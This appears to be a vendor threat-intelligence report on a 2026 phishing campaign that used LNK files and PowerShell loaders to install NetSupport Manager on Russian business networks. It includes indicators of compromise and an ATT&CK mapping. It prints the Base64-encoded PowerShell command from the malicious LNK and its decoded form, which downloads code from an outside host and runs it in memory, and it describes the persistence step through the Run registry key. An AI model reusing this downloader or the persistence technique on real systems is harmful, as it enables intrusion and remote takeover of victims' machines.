Clubfoot Wolf launches massive offensive on Russian businesses
Overview
In May and June 2026, the Clubfoot Wolf cluster conducted a large‑scale campaign targeting Russian organizations across the following sectors:
- manufacturing
- retail
- e‑commerce
- agriculture
- IT
- transportation
- healthcare
- science
The primary targets were Russian wholesale distributors of chemical products. The adversary also attacked several organizations in Belarus.
To initially compromise victims, Clubfoot Wolf sent out phishing emails containing legitimate remote administration software NetSupport Manager. Once deployed, the software was used to execute malicious activities.
Key findings
- Clubfoot Wolf uses NetSupport Manager as the main payload. The adversary experiments with delivery methods, modifying infection chains and masking techniques.
- The cluster employs URL shorteners to hide its delivery infrastructure for subsequent attack stages and hinder the analysis and detection of final URLs.
- As in previous campaigns, Clubfoot Wolf distributes archives with bogus correspondence on behalf of Russian organizations. Decoy files are used to build trust with victims and convince them to open malicious attachments.
Campaign
Phishing email
Clubfoot Wolf gained initial access via phishing emails disguised as invoices or requests for proposal. In the emails, the attackers posed as employees of a company interested in purchasing products from the target organization.
The messages contained a ZIP archive with decoy documents and a malicious LNK file. To deliver the phishing material, Clubfoot Wolf used the Yandex Mail service.
ZIP archive
Clubfoot Woolf's ZIP archives contained a malicious LNK and two or three decoy files of various formats (PDF, JPG, PNG, DOC, and DOCX).
The names of the ZIP archives in the phishing emails follow the pattern Заявка [название компании] [номер].zip (Request [company name] [number].zip).
The names of the malicious LNKs follow the pattern Заявка на закупку от компании [название компании] на [год]г.lnk (Purchase order [company name] for [year].lnk).
Decoy file names:
выписка [redacted] 21.09.21.pdf(extract)Маркетинговая карта ООО [redacted].doc(marketing profile)Выписка из [redacted].pdf(extract)Реквизиты ООО [redacted] (НОВЫЕ).doc(company details)Карточка_предприятия.docx(company profile)св‑во о постановке на учет.jpg(registration certificate)Анкета [redacted].pdf(questionnaire)Свидетельство о постановке в [redacted].pdf(registration certificate)Карточка_ООО_[redacted]_НОВАЯ.doc(company profile)Снимок экрана_2023‑07‑02_16‑04‑35.png(screenshot)Карточка клиента ООО [redacted].doc(customer profile)Свидетельство ИНН.jpg(TIN certificate)Свидетельство ОГРН.jpg(OGRN certificate)ИНН ОГРН Свидетельство о рег. в [redacted] от 16.04.2019.pdf(TIN OGRN certificate)Карточка организации АО [redacted].doc(company profile)
Examples of decoy files are provided below.
LNK file
Launching a malicious LNK file triggers the execution of a Base64‑encoded PowerShell command:
powershell.exe -E OwBHAGUAdAAtAEgAZQBsAHAAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAPQBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtAGEAZwBhAHoAaQBuAGUAPQAiAGgAdAB0AHAAcwA6AC8ALwBjAHIAbwBwAC4AcwBoAC8ANgB6AFUAbwA4AE8AawAiADsAJABtAGEAcgBpAGUAPQAoAGcAYwBtACAAKgB2AG8AKgBwACoAcwAqAG4AKQAuAG4AYQBtAGUAOwAkAGMAbABhAGkAcgBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABNAFMAWABNAEwAMgAuAFMAZQByAHYAZQByAFgATQBMAEgAVABUAFAAOwAkAGMAbABhAGkAcgBlAC4AbwBwAGUAbgAoACIARwBFAFQAIgAsACAAJABtAGEAZwBhAHoAaQBuAGUALAAgACQAZgBhAGwAcwBlACkAOwAkAGMAbABhAGkAcgBlAC4AcwBlAG4AZAAoACkAOwAmACAAJABtAGEAcgBpAGUAIAAkAGMAbABhAGkAcgBlAC4AcgBlAHMAcABvAG4AcwBlAFQAZQB4AHQAOwBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBHAG8AbwBkACAAcgBlAGEAZAAiADsAOwA= -W 1
Decoded and formatted, the PowerShell command looks as follows:
Get-Help;
[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;
$magazine="hxxps://crop[.]sh/6zUo8Ok";
$marie=(gcm *vo*p*s*n).name;
$claire=New-Object -ComObject MSXML2.ServerXMLHTTP;
$claire.open("GET", $magazine, $false);
$claire.send();
& $marie $claire.responseText;
Write-Host "Good read";This command executes an HTTPS GET request to a remote resource hxxps://crop[.]sh/6zUo8Ok (original link: hxxps://sunlightfriends[.]tech/weather/news), retrieves the response, and executes it via Invoke‑Expression. This implements fileless download and execution of the next stage directly in the memory of the PowerShell process.
In this campaign, Clubfoot Wolf actively used the URLCrop link shortener.
PowerShell script
The PowerShell script loaded into memory is a loader containing PowerShell code that is Base64‑encoded and encrypted with AES‑128‑CBC using PKCS7 padding. After decoding and decryption, the resulting PowerShell script is converted into a UTF‑8 string and executed in memory.
The decoded and decrypted script is shown below:
The script performs the following:
- Creates the file
%USERPROFILE%\Documents\TextDocument_N0213411.txtand writes the string?????????—??? ????—?????????5432??? ???????337????????? ?????????? ??????-4322/31-25, ??????-P11311/233 Priceinto it. The file is then opened to distract the victim and display seemingly encoded or corrupted content. In other versions of the PowerShell script, a link to a document on Yandex Disk is opened in the default web browser, for example,$LAOJCm = "hxxps://disk.yandex[.]ru/i/RgUWO-uhakJF8w"; (New-Object -ComObject Shell.Application).Open($LAOJCm). - Downloads a ZIP archive from
hxxps://crop[.]sh/OSRXf5B(original link:hxxps://sunlightfriends[.]tech/weekly/forecast) and saves it under a random name[A-Za-z0-9]{7}.zipin%TEMP%, for instance,%TEMP%\R7MIOBg.zip. The downloaded archive contains the files required to run NetSupport Manager, a legitimate remote administration tool. - Checks for
%LOCALAPPDATA%\VoiceAssistantand creates the directory if it does not exist. The script then opens the ZIP archive as a virtual folder and silently copies its contents to%LOCALAPPDATA%\VoiceAssistant. - Decodes, decrypts, and executes the PowerShell code that launches
%LOCALAPPDATA%\VoiceAssistant\voiceassist.exe. Thevoiceassist.exefile is the NetSupport Manager client 14.2.0.966. - Decodes, decrypts, and executes the PowerShell code that persists NetSupport Manager by creating the following Run registry entry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run] VoiceAssistant = «%LOCALAPPDATA%\VoiceAssistant\voiceassist.exe.exe». Notably, in this variant, the attackers made a typo in the executable namevoiceassist.exe, specifying a double .exe.exe extension. In other samples, this typo is absent, allowing NetSupport Manager to persist successfully on the compromised system.
NetSupport Manager archive
In addition to the main components of the NetSupport Manager software, the ZIP archive contained files with automatically generated junk text—likely added to alter the archive's hash and make it appear to be a legitimate software package.
Indicators of compromise
Checksums
b24b8d96ebea10cb7e9ffb73256cc46f9041123e7c2cc26fe92d355a8378a87c490585f82a0ddaafd9eead803859e06dafc0219a5bd1c08482c98f3d37eec231b90a7f17b5406db3ee17ec4bc82a704c6128b4ad8652776b4f55bc3948fa83850c2947904711ef63ac3cc24ba2e7a059e318dc219d14eeaebb6b46fd277f7f3d38d96dd1c26a7a98c8b55c925863d0f5c8c099a73192c65e3a1e47ea636d3d29100e0ca51a6a25efac16627be80c7ce992a5506470136e43cb8b24d8828ba82b11ad9f6c235ea561317d89590fa41d75348019850735b998b60661635ad99e9a03dbaee9cbc05abb6a35fd7804dcf7e83e0675da40eabcfd161d1d6b387363b36478585efed46b0616ca201c51464de7af5ba8985c3b948f9b67db09cbd62e970c2947904711ef63ac3cc24ba2e7a059e318dc219d14eeaebb6b46fd277f7f3de20c0900513551265dda37ce5334c71f5b0e8b20e19f9d8391f77987e2458f20
cee0ad69647d4840013e836b657d8fd79b9be7389ccbc70e15c5cb96bf926f8abea07bc2359e8f3ce914b0027b5548ae58c9a019f330446b2c81050cd9ca1b0db2e8f9f9a69c1be0d1814b064b73586afbf730e2ab9d9fb10dd5711be4febe8531b0f515012355e104a1e4f10baff85c3066a037f17272ce9c2445fd8377a96aaedcfbac94161f74b2ce63ad9da2f613809860fc8aa09d6ea0b57e964c47f8a820c8fd700796b80ea093e23ec812943adfc63c3b8653bb09b581fd7f4127c652c5a1dee1ae7f0a04dfa91481d0c1d5ad5c887a77e657def8878af600a98fd8c682671b7f09811ff38b3cab186776d06cc9e89d434080f1eb26fa1c35767eaca573bd4f12f3e7d155dfbcb6d016b99d40cce8554964ecc51de40b70fab3a4c3a520c8fd700796b80ea093e23ec812943adfc63c3b8653bb09b581fd7f4127c652
bed54c819cc8ff502fff41f6d9c726836b6086c9afdd47f2261809196c973c3879f169be997f883ef02559a0af3f014f63c1c0308931913decd79c0aafaf659f9fa461bd75788d27ceb778dc0f9773d641e804b3e10103c482ba4747153178f845154678b808a70316f0172a5012ffdfc7d7ddcde856440099fcdbad64e84ddb41c1b4b09cb3185075f57befd5278119ee0a952418144779898378f0963897e97b6f6fe88ff9d953965e81b1bed256528c93ff159156bc17b8811d7cfd5dfe4753c6a0a51ef3cf9d38034a7600c94e1ae3968dbec5bbb5d9fdcd26764c6b30e2644ad315071324e7f86e9b04dfc7dae515ca1a7ae386b21207c4ab38d1a164d63325be6c18c35b66e7f527950af97a4235e04d026a81780c135d6cec3f8245db4972b6583645d28600f076e73def05890b54a9d98c8b328d61f421c79a021db6b38032f5b2059cacc28246dd0b739e19b6a68daf34add740d5ce6be87354b4987f58b98e9d4b2d06dadef2b8656d337283118a135806dd711fb9de51ca63911dfb25a19a74bc7549f5e4e1f299886fb09a9d5b4fd4599c5a9b7f2d534ce716918fde3f60f9ae901a9fa04888d3050c9a65fb63722a4b41a6d6ad7d38183c37d5f15e4e140fceeb393bcb2c8d61a2333b37c30270527b5c48d8440e3ec1e02ae4cdf7c97cfb494ade90886765606294db0b98a2576bc1d152bc8c4ec97672b687fa877d45432e7712d1832508c77f063958a5cec05038152eb2be5e79992c3966644ad315071324e7f86e9b04dfc7dae515ca1a7ae386b21207c4ab38d1a164d653c6a0a51ef3cf9d38034a7600c94e1ae3968dbec5bbb5d9fdcd26764c6b30e2
fa07773b3af0539442504f86973fe2a68e040f80ebea388c5ed62d8f94eddb6ad3c90e61c3ffa059658c36e39334cb38c0b23cbde46f5078705fcfad67c9f3d86a8dfd602daa3b9dc2ceb146837a7966a37af8ab224ed11478e1f6d87f375b7f
c709c30074155f8f0a431828c23cc08df6959505051578ec28659a47a4da2fa6
Network indicators
hxxps://crop[.]sh/6zUo8Okhxxps://crop[.]sh/OSRXf5Bhxxps://crop[.]sh/9hXkrRNhxxps://crop[.]sh/r1zUUv4hxxps://crop[.]sh/mD5Gmt2hxxps://crop[.]sh/KzcOSm7hxxps://crop[.]sh/0x47s6Bhxxps://crop[.]sh/72TT8cOhxxps://crop[.]sh/enuSDJGhxxps://crop[.]sh/OLiH8ADhxxps://crop[.]sh/NfhStZDhxxps://crop[.]sh/ncPHvl0hxxps://sunlightfriends[.]tech/weather/newshxxps://sunlightfriends[.]tech/weekly/forecasthxxps://sunlightfriends[.]tech/latest/newshxxps://sunlightfriends[.]tech/monthly/horoscopehxxps://sunlightfriends[.]tech/beauty/serieshxxps://sunlightfriends[.]tech/health/shampoohxxps://sunlightfriends[.]tech/world/libraryhxxps://sunlightfriends[.]tech/nature/todayhxxps://sunlightfriends[.]tech/learning/portalhxxps://fleepsterones[.]fun/fashion/weekhxxps://fleepsterones[.]fun/media/likehxxps://fleepsterones[.]fun/content/articleshxxps://disk.yandex[.]ru/i/6s3ZGTQf7T_P-ghxxps://disk.yandex[.]ru/i/RgUWO-uhakJF8w
fleepsterones[.]funsunlightfriends[.]tech
stillpaving[.]com:1411glowstickspro[.]com:1411imhfamily[.]com:1414akiliridge[.]com:1414
MITRE ATT&CK
| Tactic | Technique | Procedure |
|---|---|---|
|
Resource Development |
Acquire Infrastructure: Domains |
Clubfoot Wolf registers .fun, .tech, and .com domains |
|
Acquire Infrastructure: Virtual Private Server |
Rents virtual private servers to host its tools and NetSupport Manager C2 servers |
|
|
Develop Capabilities: Malware |
Develops malicious LNK files and PowerShell scripts to deliver NetSupport Manager into target systems |
|
|
Establish Accounts: Email Accounts |
Registers email accounts with Yandex Mail |
|
|
Obtain Capabilities: Tool |
Uses the legitimate remote administration tool NetSupport Manager in attacks |
|
|
Stage Capabilities: Upload Malware |
Hosts a malicious PowerShell script for in‑memory download and execution |
|
|
Stage Capabilities: Upload Tool |
Hosts a ZIP archive with NetSupport Manager |
|
|
Stage Capabilities: Link Target |
Uses URLCrop to shorten links |
|
|
Initial Access |
Phishing: Spearphishing Attachment |
Distributes malware in ZIP attachments to phishing emails |
|
Execution |
Command and Scripting Interpreter: PowerShell |
Uses malicious LNK files to execute a PowerShell command: |
|
User Execution: Malicious File |
Initiates system compromise when the user opens the malicious LNK file delivered in the phishing email |
|
|
Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Uses a PowerShell script to add NetSupport Manager in the startup folder via the Run registry key:
|
|
Stealth |
Deobfuscate/Decode Files or Information |
Uses PowerShell obfuscation techniques, including variable name randomization, string concatenation, and AES‑128‑CBC encryption of string constants followed by Base64 encoding |
|
Hide Artifacts: Hidden Window |
Stealthily executes the PowerShell command when launching the LNK file, using the |
|
|
Masquerading |
Disguises malicious LNK files as a purchase order: |
|
|
Masquerading: Match Legitimate Resource Name or Location |
Copies NetSupport Manager from the downloaded ZIP archives to a directory mimicking a legitimate software name: Creates parameters in the Run registry key, mimicking those of trusted software:
|
|
|
Obfuscated Files or Information |
Obfuscates PowerShell scripts |
|
|
Obfuscated Files or Information: Command Obfuscation |
Base64‑encodes PowerShell commands in LNK files |
|
|
Command and Control |
Application Layer Protocol: Web Protocols |
Uses HTTP(S) to communicate with its network resources |
|
Encrypted Channel: Asymmetric Cryptography |
Uses SSL/TLS encryption to communicate with its network resources |
|
|
Ingress Tool Transfer |
Uses PowerShell scripts to download the next‑stage PowerShell script and the ZIP archive with NetSupport Manager |
|
|
Non‑Standard Port |
Uses non‑standard ports 1411 and 1414 for NetSupport Manager control servers |
|
|
Remote Access Tools: Remote Desktop Software |
Uses NetSupport Manager to control the compromised host |
|
|
Web Service |
Uses the Yandex Disk cloud storage to host decoy PDF documents |
Clubfoot Wolf relies on phishing emails with malicious attachments and continuously modifies its techniques. BI.ZONE Mail Security blocks such emails before they reach users. The solution applies more than 100 filtering mechanisms, including statistical, signature‑based, linguistic, content, and heuristic analysis, YARA rules, and computer vision, supplemented by multiple AI models. It also protects against server auto‑reply loops and bounce messages, filtering out unwanted correspondence without delaying legitimate traffic.
Proactive defense starts with understanding attackers' methods and tools. BI.ZONE Threat Intelligence provides up‑to‑date information on threat actors, their tactics, techniques, and tools, along with detection guidance. This enables organizations to integrate threat intelligence into their security operations and prevent incidents.